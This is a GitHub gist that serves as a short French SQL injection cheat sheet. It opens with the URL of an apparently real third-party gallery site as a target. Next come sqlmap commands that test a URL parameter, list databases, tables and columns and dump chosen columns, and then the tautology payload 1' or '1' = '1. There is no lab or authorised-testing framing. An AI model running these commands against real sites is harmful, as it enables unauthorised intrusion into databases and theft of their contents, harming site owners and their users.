Skip to content

Instantly share code, notes, and snippets.

@rzdhop
Created October 10, 2019 20:20
Show Gist options
  • Save rzdhop/2c52bdbb083e6436793465de8c804689 to your computer and use it in GitHub Desktop.
Save rzdhop/2c52bdbb083e6436793465de8c804689 to your computer and use it in GitHub Desktop.
http://www.melbournefineart.com.au/gallery.php?id=18
===============================SQL url based========================
-Test le site avec
url.fr/index.php/id=test'
#id ou test=test
-si error alors site faillible
Methode 1
-sudo sqlmap -u url.fr/index.php?id=3654 --batch
#effectuer l'injection
-sudo sqlmap -u url.fr/index.php --dbs
#liste les DB dispo
-sudo sqlmap -u url.fr/index.php -D NOMDEDB --tables
#obtenir les tables de la DB
-sudo sqlmap -u url.fr/index.php -D NOMDEDB -T NOMDETABLE --columns
#obtenir les colonnes
-sudo sqlmap -u url.fr/index.php -D NOMDEDB -T NOMDETABLE -C NOMDECOLONNE1,NOMDECOLONNE2,... --dump
=================================================================
=============================ID BASED=============================
Entry = 1' to test
if error == vulnerability
1' or '1' = '1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment